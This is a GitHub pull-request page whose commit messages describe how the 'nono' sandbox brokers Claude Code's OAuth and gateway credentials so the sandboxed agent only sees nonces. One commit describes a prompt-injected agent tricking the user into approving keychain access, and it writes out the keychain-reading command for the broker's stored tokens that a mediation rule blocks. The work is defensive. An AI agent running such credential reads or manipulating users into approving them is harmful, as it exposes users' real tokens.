there (argv leak `c873ca36`, 128-byte `readpassphrase` truncation `aa4e51af`) which this implementation avoids by construction. Stale-entry handling: the stored `nono_path` field is compared against `current_exe()` on load. A mismatch (upgrade, reinstall, `cargo install` rebuild) means the existing entry's ACL is keyed to a binary that no longer matches; the broker deletes the stale entry and returns None. Next OAuth capture creates a fresh entry with the correct ACL. Linux is not supported. Linux keyring backends (secret-service, gnome-keyring) have no per-entry ACL — entries are readable by any same-user process, defeating the protection model. Linux callers get an in-memory-only broker. Tests (7 new in broker.rs, 4 in broker_store.rs): - `capture_oauth_pair_without_store_just_issues_two_nonces` — default trait behaviour for the no-store path. - `capture_oauth_pair_with_store_persists_record` — pair-capture writes through to the store. - `with_store_hydrates_existing_record_into_memory` — startup re-registers nonces from the persisted record so the keychain's stale-looking nonces resolve immediately. - `with_store_propagates_load_errors` — load errors are not silent (a corrupted persisted record fails loudly rather than degrading). - `capture_oauth_pair_swallows_save_errors` — save errors are best-effort; capture path keeps working in-memory. - `persisted_json_payload_exceeds_readpassphrase_buffer` — regression guard against reintroducing a `security ... -w` (stdin to readpassphrase) backend. - `nono_path_round_trips_through_json` + `missing_nono_path_deserialises_as_none` — staleness detection field handling. - `memory_store_round_trips_save_load_clear` — in-memory test backend invariant. All 120 mediation tests pass (was 113 on parent branch). `cargo clippy -D warnings -D clippy::unwrap_used` clean. Signed-off-by: Christine Le <christine.le@datadoghq.com>
Addresses limitations #1 (orphan GC) and #4 (refresh pruning) from the 2026-06-09 addendum in 2026-04-27-capture-anthropic-auth.md. ## Limitation #1: orphan GC at hydrate time When the user runs `/logout` inside claude, the `Claude Code-credentials` keychain entry is wiped — but the broker's persisted record still holds the real refresh token. Without GC, the next nono session would rehydrate dead tokens that Anthropic still considers valid (refresh tokens live ~1 year), violating the user's "logout means tokens are gone" mental model. `TokenBroker::with_store_and_reader` adds a hook that reads claude's own keychain entry on startup. If `claudeAiOauth.accessToken` matches the persisted `access_nonce`, the record is live and hydrates normally. Otherwise (entry missing, holds a real `sk-ant-...` token, or holds a different nonce from another session), the broker clears the persisted record and starts empty. The next `/login` will mint fresh nonces. Read failures collapse to "entry missing" (conservative choice: drop a live record and force re-login rather than leak a real token because we couldn't tell). The existing `with_store` shorthand keeps a no-op reader for backwards compat — appropriate for command-mediation callers that don't have a `Claude Code-credentials` entry to cross-reference. ## Limitation #4: refresh-rotation pruning Long sessions trigger token refresh; the proxy intercepts each new pair and calls `capture_oauth_pair`. Previously the OLD nonces stayed in the in-memory map until session end, so the map grew with refresh count over multi-day sessions. `TokenBroker` now tracks `current_pair: Mutex<Option<(access_nonce, refresh_nonce)>>`. `capture_oauth_pair` prunes the previous pair from the in-memory map before minting the new one, and updates `current_pair` to the new nonces. Hydrate also sets `current_pair` so the first post-hydrate capture prunes the hydrated pair. ## Production wiring `proxy_runtime::build_broker` now passes the real keychain reader (`broker_store::current_claude_access_token`). The reader replicates the keychain service-name derivation from `sandbox_prepare.rs` — mirror rather than depend, so this module stays self-contained. ## Tests (+5 over previous commit, 20 total in broker.rs) - `with_store_hydrates_existing_record_when_claude_keychain_matches` — happy path; live record hydrates. - `with_store_clears_orphan_when_claude_keychain_missing` — `/logout` case; broker record cleared. - `with_store_clears_orphan_when_claude_keychain_holds_real_token` — user `/login`-ed outside nono after `/logout`; record cleared. - `with_store_clears_orphan_when_claude_keychain_holds_different_nonce` — race with another nono session; record cleared, latest wins. - `capture_oauth_pair_prunes_previous_pair_from_memory` — refresh rotation; old nonces removed. - `hydrate_then_capture_prunes_hydrated_pair` — hydrated pair pruned on first refresh after session start. All 127 mediation tests pass. `cargo clippy -D warnings -D clippy::unwrap_used` clean. Signed-off-by: Christine Le <christine.le@datadoghq.com>
Addresses limitation #3 from the 2026-06-09 addendum. The default login keychain is auto-unlocked at GUI login but locks on sleep and is generally not unlocked under SSH. Without distinguishing these failures from other Security framework errors, the user sees a generic "broker record load failed" warning and cannot tell whether the issue is environmental (unlock the keychain) or a real bug. Classifies three OSStatus codes as "keychain locked": - errSecInteractionNotAllowed (-25308) — UI required but not allowed - errSecAuthFailed (-25293) — authentication failed - errSecNotAvailable (-25304) — no keychain available Both `load_in_process` and `save_with_nono_acl` emit a single actionable message naming the common causes (SSH, post-sleep, manual lock) and stating the consequence ("cross-session resume disabled"). The build_broker fallback path surfaces this message verbatim — no further changes needed there since the existing warn already prints the error. `build_broker` continues to fall back to an in-memory-only broker when the keychain is locked, so the current session works unchanged — only cross-session resume is lost until the user unlocks the keychain. Tests: - `locked_keychain_status_recognised_for_known_codes` — the three codes classify as locked. - `locked_keychain_status_rejects_other_codes` — errSecItemNotFound, errSecParam, and success do not classify as locked. - `locked_keychain_message_is_actionable` — message names failure mode + common cause + consequence + OSStatus code, and does not contain real-token-shaped strings. All 134 mediation tests pass (was 127). `cargo clippy -D warnings -D clippy::unwrap_used` clean. Signed-off-by: Christine Le <christine.le@datadoghq.com>
Addresses limitation #9 (ACL invariant assertion) from the 2026-06-09 addendum. The persistence model is only safe as long as every broker keychain entry is written with a code-signed ACL restricting access to the nono binary. If a future refactor uses `keyring::set_password` (or plain `SecItemAdd` without `kSecAttrAccess`), the agent reads the real OAuth tokens directly. The threat is structural rather than runtime — a single refactor in the wrong direction silently breaks the invariant. Defenses added: 1. Load-bearing docstring on the module's `## Keychain ACL` section, stating the invariant explicitly and listing the forbidden API (`keyring::set_password`). The `keyring` crate is intentionally not imported by this module's macOS code; the comment makes that non-accidental. 2. Unit test `create_nono_access_succeeds_for_current_exe` — the production-path ACL builder works against the running binary. 3. Unit test `create_nono_access_fails_for_nonexistent_path` — the ACL builder fails closed when given a bogus path rather than silently producing an access tied to a dangling reference. This is the guard against a future bug (relative-path resolution, etc.) producing a permissive-by-accident entry. 4. `#[ignore]`-d integration test `acl_round_trip_manual_only` — full save/load round-trip against the real login keychain, runnable before a release that changes anything in the macOS save path. Includes a TODO for extending it with the SecAccessCopyACLList walk to assert exactly-one-trusted-app-matching-current-exe; until that FFI lands, manual inspection via Keychain Access.app during the test window is the floor. All 132 mediation tests pass + 1 ignored. Clippy clean. Signed-off-by: Christine Le <christine.le@datadoghq.com>
…ds (macOS)
Closes the "user clicks Allow on prompt-injected dialog" threat
discovered in manual security testing on 2026-06-09.
## Background
Earlier commits on this branch persist captured OAuth pairs to a
keychain entry under `service="nono", account="claude_oauth_broker"`
with a legacy `SecAccess` ACL listing only the nono binary as a
trusted application. The original commit message claimed `securityd`
"silently denies" non-trusted callers. Testing confirmed this was
wrong: the legacy ACL triggers a system dialog ("X wants to access
key 'nono' in your keychain") asking the user to Allow or Deny.
A sophisticated prompt-injected agent that social-engineers the user
into clicking Allow defeats the ACL. The protection model needed to
either eliminate the prompt (true silent denial) or close the
attack path before it reaches securityd.
## What this commit does
Auto-injects a mediation rule into `MediationConfig` whenever a
profile sets `oauth_capture: true`. The shim intercepts subprocess
`security find-generic-password -s nono -a claude_oauth_broker`
(both argv orderings) in the unsandboxed parent process and returns
`errSecItemNotFound` (exit 44, empty stdout) without ever invoking
the real binary. The call never reaches macOS securityd. No dialog,
no Allow button, no social-engineering surface.
The legacy ACL on the broker entry is now defense-in-depth, not the
primary protection. It catches direct Mach IPC bypasses
(`SecItemCopyMatching` from a native binary linked against
Security framework) with the same dialog as before — the user sees
a visible alert. That is the residual Mach-IPC gap the
2026-06-03 plan already accepted for the `Claude Code-credentials`
entry.
## Coverage
- Both flag orderings: `-s X -a Y` and `-a Y -s X`. The matcher
filters `-`-prefixed tokens, so the positional stream is what
determines the match. Argv parsing was confirmed against
`/usr/bin/security` directly:
- Pure positional (`find-generic-password nono claude_oauth_broker`)
is rejected by the security CLI — service/account must be flags.
- A leading positional that's a real keychain path changes the
search target via BSD getopt, so it cannot read the broker
entry through this bypass.
- Reads only (resolved decision). Write attempts
(`add-generic-password`, `delete-generic-password`) fall through
to passthrough; the legacy ACL catches them and the user sees a
dialog as defense-in-depth.
- Merge semantics: Prepend (resolved decision). Auto-injected
intercepts are evaluated FIRST, before any profile-declared
rules. A downstream profile cannot displace the protection by
accident or design.
## Implementation
- New module `crates/nono-cli/src/mediation/broker_protection.rs`:
- `oauth_capture_mediation_rules() -> Vec<CommandEntry>` — builds
the `security` CommandEntry with refusal intercepts.
- `inject_into(&mut MediationConfig)` — prepends the auto-injected
intercepts onto any existing `security` entry, or creates one
if absent.
- `sandbox_prepare.rs` hook: when `profile.oauth_capture` is true,
call `broker_protection::inject_into(&mut profile_mediation)`
before constructing `PreparedSandbox`.
## Tests
7 new unit tests in `broker_protection`:
- module returns one CommandEntry named "security"
- refusal intercepts use Respond with exit 44 + empty stdout
- both argv orderings covered
- inject creates entry when security absent
- inject prepends to existing security entry (merge correctness)
- inject does not touch other CommandEntry names
- (macOS) constants match `broker_store` constants (compile-time
consistency)
7 new integration tests in `mediation::policy::apply`:
- service-first argv blocked (exit 44, empty stdout, no leak)
- account-first argv blocked (alternate ordering)
- interleaved-flags variant blocked
- trailing-keychain-positional variant blocked
- other service/account combos pass through (no over-blocking of
`service="nono", account="openai_api_key"` style entries)
- `Claude Code-credentials` reads pass through (no displacement of
shadowfax's existing rule)
- auto-injected refusal fires BEFORE a pathological profile-
declared catch-all (Prepend merge correctness via apply)
## Documentation corrections
- `broker_store.rs` module docstring — replaces the "silently denies"
claim with the two-layer model: mediation refusal as primary
protection, legacy ACL as defense-in-depth against Mach IPC.
- `broker_store.rs::create_nono_access` docstring — same correction
at the function level.
- `2026-04-27-capture-anthropic-auth.md` 2026-06-09 addendum gets a
follow-up note: the earlier text overstated the ACL's role.
Limitation #9 is rewritten to describe the actual protection
layering.
## What does NOT change
- `KeystoreBrokerStore::save` / `load` implementation — the ACL is
still set, still load-bearing as defense-in-depth.
- `proxy_runtime::build_broker` — still wires the keystore.
- All orphan-GC, refresh-pruning, locked-keychain logic from prior
commits on this branch.
- Release pipeline — no code-signing, no entitlements, no
notarization changes. Auto-injection of the mediation rule
works on unsigned dev builds and on signed release builds
identically.
All 146 mediation tests pass (was 132 + 14 new). `cargo clippy
-D warnings -D clippy::unwrap_used` clean. `cargo fmt --check`
clean.
Manual security re-test (S2 from the prior review session) must
confirm: agent's `security find-generic-password -s nono -a
claude_oauth_broker -w` from inside the sandbox now returns exit
44 with no dialog. The argv-coverage audit is documented in the
new module's docstring; any argv shape that bypasses the rule
indicates a coverage gap and needs an additional intercept.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Adds a new profile field, broker-backed reverse-proxy route, and preflight check that together let nono mediate Claude Code's apiKeyHelper-issued bearer tokens through an arbitrary upstream gateway. The real bearer stays in the unsandboxed parent; the sandboxed agent only ever sees `nono_<hex>` nonces. The proxy resolves nonces to real bearers on egress to the configured gateway upstream. All gateway-specific values (URL, helper binary name, helper argv prefix, allowed domain) are supplied via the profile JSON — the shipping code is vendor-neutral. Reuses the TokenBroker + reverse-proxy passthrough machinery from PR #40's OAuth-capture work; no new primitives. - crates/nono-cli/src/profile/mod.rs: ApiKeyGatewayConfig + plumbing through Profile, ProfileDeserialize, merge_profiles, test literals - crates/nono-cli/src/sandbox_prepare.rs: PreparedSandbox.apikey_gateway - crates/nono-cli/src/launch_runtime.rs: ProxyLaunchOptions field + mediation pass-through so preflight can verify coverage - crates/nono-cli/src/proxy_runtime.rs: apikey_gateway_route() at reserved __nono_apikey_gateway prefix; ANTHROPIC_BASE_URL override; broker wiring shared with oauth_capture - crates/nono-cli/src/oauth_preflight.rs: apiKeyHelper coverage check reading ~/.claude/settings.json; shell_split; covering-rule lookup; three new unit tests using the codebase's ENV_LOCK + EnvVarGuard Signed-off-by: Christine Le <christine.le@datadoghq.com> Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…roxy The mediation server created its own TokenBroker via TokenBroker::new() in session.rs:286, distinct from the proxy's broker passed in via ProxyRuntime.token_resolver. Nonces minted by the mediation shim's capture action lived in the mediation broker's map; the proxy's TLS-intercept egress path queried a different map and got None, forwarding the raw nono_<hex> nonce to upstream which 401'd every request. The bug only surfaced when both sides interacted, which is new with apikey_gateway — oauth_capture's capture+resolve both happen inside the proxy, so PR40's broker has always been shared by construction. Wire a single Arc<TokenBroker>: proxy_runtime now constructs the broker and exposes the Arc via ActiveProxyRuntime.broker. The execution runtime passes it into mediation::session::setup as shared_broker, which falls back to TokenBroker::new() when not provided (preserves pre-existing behavior for command-mediation-only sessions with no proxy involvement). Verified end-to-end: claude apiKeyHelper -> mediation capture -> proxy resolution -> real bearer to gateway -> 200 OK -> PONG. Signed-off-by: Christine Le <christine.le@datadoghq.com> Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Generalises the two existing provider-specific features
(oauth_capture: true and apikey_gateway: {...}) into a single
configurable primitive, credential_routes: [...]. New provider
integrations (Codex, custom gateways) declare a route entry instead
of adding a new top-level Profile field.
The four orthogonal axes a route declares:
1. capture - where the real token comes from
(OauthIntercept | HelperCommand)
2. delivery - how the agent's HTTP traffic reaches the proxy
(Direct | Redirected with env-var overrides)
3. bearer - header + format carrying the nonce inbound and
the real token outbound
4. preflight - preconditions (NoStaticApiKeySurfaces |
ClaudeCodeApiKeyHelperConfigured)
Everything else (broker, mediation plumbing, nonce resolution,
audit logging) is implicit and handled identically across routes.
Existing profile JSONs keep working unchanged. The legacy
oauth_capture: true and apikey_gateway: {...} fields are translated
into synthesised credential_routes entries at profile-resolve time
(resolve_credential_routes). Downstream code (PreparedSandbox,
ProxyLaunchOptions, start_proxy_runtime, preflight) only sees the
unified representation.
Schema additions in profile/mod.rs:
- ManagedCredentialRoute (the entry type)
- CredentialRouteCapture enum (OauthIntercept | HelperCommand)
- CredentialRouteDelivery enum (Direct | Redirected)
- CredentialEnvOverride (env var to set, with ROUTE_BASE_URL
expansion at runtime)
- CredentialRouteBearer (header + format)
- CredentialRoutePreflight enum (NoStaticApiKeySurfaces |
ClaudeCodeApiKeyHelperConfigured)
- resolve_credential_routes() (legacy shim)
proxy_runtime.rs replaces oauth_capture_routes() +
apikey_gateway_route() with synthesize_proxy_routes(&route) and
build_route_env_overrides(&route, port). Per-feature boolean flags
(oauth_capture_active, apikey_gateway_active) collapse to
broker_required and has_oauth_intercept_route, both derived from
the unified list.
oauth_preflight.rs replaces run_oauth_preflight (signature took
ApiKeyGatewayConfig) with run_credential_routes_preflight that
iterates a route slice and dispatches per declared preflight check.
The helper-command coverage check now reads its expected helper
argv from the route's capture config rather than a legacy-shaped
struct.
Verified end-to-end against the existing claude-code-with-ddtool-
gateway.json profile (uses the legacy apikey_gateway: field):
mediation capture -> shared broker -> proxy resolution ->
gateway 200 OK -> PONG.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Adds a new credential route capture type where the proxy itself runs a command in the parent process at startup to fetch and cache a credential, substituting it on every egress request for that route. The sandboxed agent never sees the real credential — the proxy parent is the sole holder. Key design points: - ProvisionedStore (nono-proxy): async in-memory cache keyed by route name. provision_all() runs all sources at proxy startup; refresh() re-runs on 401/403 (fire-and-forget). BTreeMap env; Zeroizing storage; concurrent refreshes debounced via per-slot Mutex. 8 unit tests. - Auto-injection: profile resolution appends a `respond` mediation rule on the source command so claude's apiKeyHelper invocation returns a hardcoded sentinel (PROXY_PROVISIONED_SENTINEL) rather than running the real binary in the sandbox. Conflict detection refuses startup if a manual `capture` rule on the same command/args already exists. - Egress substitution: both tls_intercept/handle.rs and reverse.rs check route.provisioned_credential_route on egress. If set, the inbound bearer header is replaced with the cached credential. Returns 401 to sandbox if agent sent no inbound credential header. - egress_headers: new field on ManagedCredentialRoute / RouteConfig / LoadedRoute. Headers in this map are injected on every outbound request for the route. Solves the case where the agent does not forward all ANTHROPIC_CUSTOM_HEADERS entries in CONNECT mode (e.g. org-id, provider required by the Datadog AI gateway). - Live-verified: ddtool gateway route with Direct delivery, provisioned dd-tok-... bearer, egress_headers injecting org-id/source/provider. claude -p "What is 17 * 23?" → 391, gateway status=200. - Design doc and test profile: 2026-06-11-proxy-provisioned-credential- design.md documents the architecture, deferred future extensions (file/http sources, retry-in-place, periodic refresh), and the Direct-vs-Redirected delivery finding (use Direct; egress_headers covers the missing-header gap). Signed-off-by: Christine Le <christine.le@datadoghq.com> Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Renames `CredentialRouteCapture::HelperCommand` to `MediatedHelper` and removes the legacy `oauth_capture` / `apikey_gateway` profile fields. `credential_routes: [...]` is now the only way to configure broker-backed credential mediation; profile authors declare each route explicitly rather than toggling per-provider flags. The rename makes the capture variant readable next to its sibling `ProxyProvisionedCredential`: both run commands, but `MediatedHelper` captures via the mediation seam (sandbox-initiated, parent runs the real binary, broker mints a nonce) while `ProxyProvisionedCredential` runs the command in the proxy parent at startup. The old name `HelperCommand` left that distinction implicit. Removed: - `Profile.oauth_capture`, `Profile.apikey_gateway`, `ApiKeyGatewayConfig` - `resolve_credential_routes` (legacy translation shim) and its 4 tests - `ProfileDef.oauth_capture` from policy.rs - `oauth_capture` schema entry - Display block in `nono profile show` for "OAuth capture: enabled" Broker-protection auto-injection now triggers on "any route uses `OauthIntercept` capture" instead of the legacy bool — same observable behaviour, derived from the unified representation. Verified: cargo build --workspace clean; cargo clippy --all-targets -D warnings clean; cargo fmt clean; 1323 nono-cli tests pass. Pre-existing nono::supervisor::socket SUN_LEN failures on this host are unrelated. Signed-off-by: Christine Le <christine.le@datadoghq.com> Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Replaces ddtool / ddbuild / rapid-ai-platform / Datadog-internal
hostnames and paths with vendor-neutral examples (my-tool,
gateway.example.com, ~/.cache/example) across docs, fixtures, and the
single live-verification test profile. No logic changes — binary names
and hostnames here are illustrative strings, not load-bearing
identifiers.
Touches:
- crates/nono-cli/src/mediation/policy.rs — the 15 upstream-flagged
refs (doc-comment on `subcommand_matches`, inline comment in
`apply_capture`, three test fixtures).
- crates/nono-cli/src/mediation/{broker,mod}.rs — docstring + 5 test
fixture strings.
- crates/nono-proxy/src/{provisioned.rs,tls_intercept/handle.rs} —
two doc-comment examples.
- docs/cli/features/profile-authoring.mdx + README.md — JSON example
blocks using vendor-neutral command + domain names.
- 2026-06-11-proxy-provisioned-credential-design.md — design-doc
examples and verification command lines.
- claude-code-with-ddtool-gateway.json -> claude-code-with-gateway.json
with internals scrubbed (route name, command, args, upstream URL,
allow_domain entry, filesystem allow path).
Verified: cargo build --workspace clean; cargo clippy --all-targets
-D warnings clean; cargo fmt clean; mediation tests 147 passed.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Removes from the PR: - `claude-code-with-gateway.json` — local live-verification test profile, not appropriate to ship in the public PR. - `2026-06-11-proxy-provisioned-credential-design.md` — design doc added alongside the proxy-provisioned-credential commit; review belongs in PR description / commit messages, not a checked-in doc. - `docs/plans/2026-05-14-mediation-profile-authoring-ux.md` - `docs/plans/2026-06-03-mediation-based-oauth-capture.md` Both introduced by PR #50; planning documents that captured pre- implementation decisions and shouldn't ship as repository docs. No code references the removed files; cargo build + nono-cli tests remain green (1323 passed). Signed-off-by: Christine Le <christine.le@datadoghq.com> Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…rfaces Three user-facing docs were silent on the credential_routes work that landed in PR #50's lineage and is now generalised in this PR. - crates/nono-proxy/README.md: add the TLS-intercept proxy mode to the modes table, add a "Credential Routes" section describing the three capture mechanisms (oauth_intercept response-body rewriting, bearer translation, proxy-provisioned credentials with refresh on 401/403) and the egress_headers field, add broker-mediated nonce resolution to security properties, and list the new internal modules (tls_intercept, forward, oauth_rewrite, broker, provisioned, route). - docs/cli/features/profile-authoring.mdx: add a "Managed Credential Routes" section with the four-axis schema (capture / delivery / bearer / preflight), per-variant descriptions, two worked profile examples (Anthropic OAuth, enterprise gateway), and the preflight checks. - docs/cli/clients/claude-code.mdx: add a "Broker-Mediated OAuth Capture" subsection under OAuth2 Login showing the minimal credential_routes profile that swaps real tokens for nonces during /login, with a link to the full schema reference. Signed-off-by: Christine Le <christine.le@datadoghq.com> Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
This PR lets a sandboxed agent talk to the Anthropic API without ever seeing real bearer credentials. Two flows are supported:
OAuth
/loginagainst api.anthropic.com. The user runsclaude /loginin the sandbox; the proxy intercepts the OAuth response, swaps the real access and refresh tokens for opaquenono_<hex>nonces before the body reaches the agent, and translates the nonces back on every egress request. The captured pair persists in a nono-controlled macOS keychain entry so subsequent sessions resume without re-login.API key issued by an enterprise gateway. The proxy parent runs a credential-issuing command at startup, caches the resulting bearer, and substitutes it on every request to the configured gateway upstream. The agent never invokes the credential command and never sees the real bearer — only a fixed placeholder flowing through its
apiKeyHelperpath.Both flows are declared through a single new profile field,
credential_routes: [{...}], with one entry per upstream.What's in the PR
OAuth-capture pipeline. Layer 1/1.2/2 bearer translation across the reverse proxy and CONNECT-tunnel TLS intercept paths, with a
TokenResolverseam and keychain-backed broker persistence (code-signed ACL, orphan GC, refresh-rotation pruning, locked-keychain detection). Auto-injects a mediation refusal rule on subprocesssecurity find-generic-passwordreads of the broker keychain entry so the realistic exfiltration path is closed silently rather than via a dialog the user could be social-engineered through.credential_routesschema. OneVec<ManagedCredentialRoute>with three capture variants (OauthIntercept,MediatedHelper,ProxyProvisionedCredential). Routes chooseDirectvsRedirecteddelivery, declare their bearer header + format, and may injectegress_headersfor gateway-required metadata the agent does not always forward in CONNECT mode.proxy_provisioned_credentialcapture. The proxy runs the credential-issuing command in its own parent at startup, caches the result inZeroizing<String>, substitutes the credential on egress, and refreshes on 401/403. The sandbox sees only a fixed placeholder. Profile resolution auto-injects arespondmediation rule on the source command and refuses startup if a conflicting manualcapturerule is declared on the same command.Shared
TokenBroker. The mediation server and the proxy share a single brokerArcso nonces minted on one side resolve correctly on the other — a load-bearing fix without which the gateway-mediation path 401s on every egress.Profile Schema
Three capture variants today:
oauth_intercept— TLS-intercept the OAuth response body, mint nonces for access/refresh, substitute in-place before the body reaches the sandbox. Keychain-backed cross-session resume.mediated_helper— sandboxed agent invokes a helper command (e.g. Claude Code'sapiKeyHelper); the mediation shim intercepts in the parent, runs the real binary there, mints a nonce on stdout, and returns the nonce to the sandbox.proxy_provisioned_credential— proxy parent runs the credential-issuing command at startup, caches the result, refreshes on 401/403. Sandbox never invokes the helper; sees only a placeholder.Future capture variants (file source, HTTP source for STS / IMDS, and non-bearer egress signing such as SigV4) extend
ProvisionSourceand the bearer axis without needing new top-level profile fields.